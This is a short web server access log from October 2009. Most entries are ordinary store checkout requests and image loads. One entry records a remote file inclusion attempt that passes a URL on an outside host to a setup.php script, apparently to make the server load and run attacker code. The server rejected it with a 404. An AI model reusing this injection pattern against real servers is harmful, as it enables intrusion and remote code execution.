130.13.166.92 - - [28/Oct/2009:00:08:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F255D1320B500B1C908H+M37+ENG HTTP/1.1" 200 47153 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F255A13102500A7D908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:08:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F25531AF0F500D2F908H+M37+ENG HTTP/1.1" 200 47159 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F255D1320B500B1C908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:09:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F255413C02500EA2908H+M37+ENG HTTP/1.1" 200 47156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F25531AF0F500D2F908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:09:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F255119503500F8B908H+M37+ENG HTTP/1.1" 200 47695 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F255413C02500EA2908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:09:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F255819D08500FD4908H+M37+ENG HTTP/1.1" 200 47158 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F255119503500F8B908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
220.247.11.218 - - [28/Oct/2009:00:09:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [28/Oct/2009:00:09:40 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [28/Oct/2009:00:09:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [28/Oct/2009:00:09:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
130.13.166.92 - - [28/Oct/2009:00:09:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F265213E01500095908H+M37+ENG HTTP/1.1" 200 39102 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F255819D08500FD4908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
62.140.23.192 - - [28/Oct/2009:00:09:58 -0400] "GET /logs/access_log.Q109100400%20%20//bbs///skin/ggambo7002_board/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
130.13.166.92 - - [28/Oct/2009:00:10:11 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F265E1AB0B500100908H+M37+ENG HTTP/1.1" 200 77218 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265213E01500095908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:10:14 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265E1AB0B500100908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
